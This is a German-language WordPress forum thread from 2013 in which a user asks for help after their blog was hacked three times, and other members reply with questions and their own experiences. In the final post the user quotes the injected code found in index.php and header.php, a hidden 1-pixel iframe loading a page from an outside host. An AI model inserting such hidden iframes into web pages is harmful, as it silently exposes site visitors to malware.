1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Site zum dritten mal gehackt..

Dieses Thema im Forum "Allgemeines" wurde erstellt von lerio, 25. Mai 2013.

  1. lerio

    lerio Active Member

    Registriert seit:
    7. Februar 2012
    Beiträge:
    29
    Zustimmungen:
    0
    hallo zusammen,

    weiß nicht mehr was ich machen soll.In 3 Wochen wurde mein Block 3x gehackt.Provider informiert,Passwörter auf Server,FTP und überall gewechselt,neue Plugins deinstalliert,unverseuchten,älteren Backup eingespielt.Bei letztem Hack habe zusätzlich einen Scanner und Schutz Plugin installiert.Trotzdem ist es seit heute wieder gehackt.Ich weiß wirklich nicht,was ich noch tun kann.Habe überlegt die Wordpress Seiten in Joomla migrieren.Wäre es vielleicht eine Lösung?

    mg.I.
     
  2. Hille

    Hille Well-Known Member

    Registriert seit:
    22. Januar 2012
    Beiträge:
    7.965
    Zustimmungen:
    9
    Ne Lösung wäre, die Sicherheitslücke zu finden. Woher weißte eigentlich, das dein Blog gehackt wurde?
     
  3. lerio

    lerio Active Member

    Registriert seit:
    7. Februar 2012
    Beiträge:
    29
    Zustimmungen:
    0
    Der Provider hat mir es geschrieben und auch von Google sind Meldungen gekommen.Google hat dan den Block auch mit Warnung auf Malware blockiert .lg.
     
  4. para1

    para1 Well-Known Member

    Registriert seit:
    14. Februar 2011
    Beiträge:
    50
    Zustimmungen:
    0
    Meine Seite mit Joomla wurde bereits 2x gehackt und mit Naziparolen "beschmiert", angebliche Täter aus der Türkei lt. damaligem Provider. Also auch nicht DIE Lösung.
     
  5. lerio

    lerio Active Member

    Registriert seit:
    7. Februar 2012
    Beiträge:
    29
    Zustimmungen:
    0
    habe es jetzt gefunden . Es ist in index.php und header.php

    }
    <!-- . --><iframe width="1px" height="1px" src=" http://die Seite:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
    <!-- . -->

    ...Wahrscheinlich ein Bild,ein ,, Punkt,, der Große nach,es verweißt auf eine Webseite...aber wie ich herausraus finde wie es auf die Seite gekommen.:sad: ...
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden